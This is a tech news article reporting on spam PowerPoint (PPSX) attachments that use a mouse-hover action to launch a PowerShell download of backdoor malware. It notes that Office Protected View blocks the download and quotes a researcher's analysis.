Mousing over a link in PowerPoint will download malware, no macros needed

Don't disable Office Protected View or hovering over this link will download malware
Don't disable Office Protected View or hovering over this link will download malware


Cybercriminals have devised a way for PowerPoint to download a malicious file when the user merely hovers the mouse over a link. 

Researchers have spotted malicious PowerPoint files being distributed in spam attachments that take a different approach to using malicious Office attachments to infect a PC. Usually these attacks work by tempting the user to open a document and, for example, displaying a blurry image that supposedly requires macros to be enable to view it.

This rigged PowerPoint cuts out clicking and will download malware when the user simply hovers the mouse over a link in the document. This could be dangerous as it goes against user expectations and recent security advice against enabling macros.  

The malicious PowerPoint files are presented as either invoices or purchase orders with email subject titles like "RE:Purchase orders #69812" or "Fwd:Confirmation", reports BleepingComputer

The attachments are in PPSX file format, the open source XML version of Office PowerPoint in slide show mode, as opposed to edit mode.  

The file contains nothing else visible but the hyperlinked text “Loading… Please wait”, and if the user mouses over the text the document will start executing a PowerShell command that attempts to run an external program and create a backdoor.   

Fortunately, Office has a security feature called Protected View, which is enabled by default and will prevent the PowerShell command from executing an external program automatically. However, users can disable it manually, which would allow it to download the malware. If it is enabled, an Office security warning dialogue pops up explaining that it’s blocked the ability to run an external program. 

Security researcher Ruben Daniel Dodge has provided a break down of how the attack works. The malware uses a PowerPoint element definition for a “hover action”, which is set up to execute a program in PowerPoint once a mouse moves over specified text, in this case being the hyperlinked text that is aimed at launching a PowerShell command.    

Once the PowerShell is executed it will call a specified domain and download several more executable files to create a backdoor. 

“This PowerPoint Document was interesting to analyze,” notes Dodge. “First of all this document was interesting as it did not rely on Macros, Javascript or VBA for the execution method. Which means this document does not conform to the normal exploitation methods.”

Tags Microsoftofficepowerpointmacro malware

Show Comments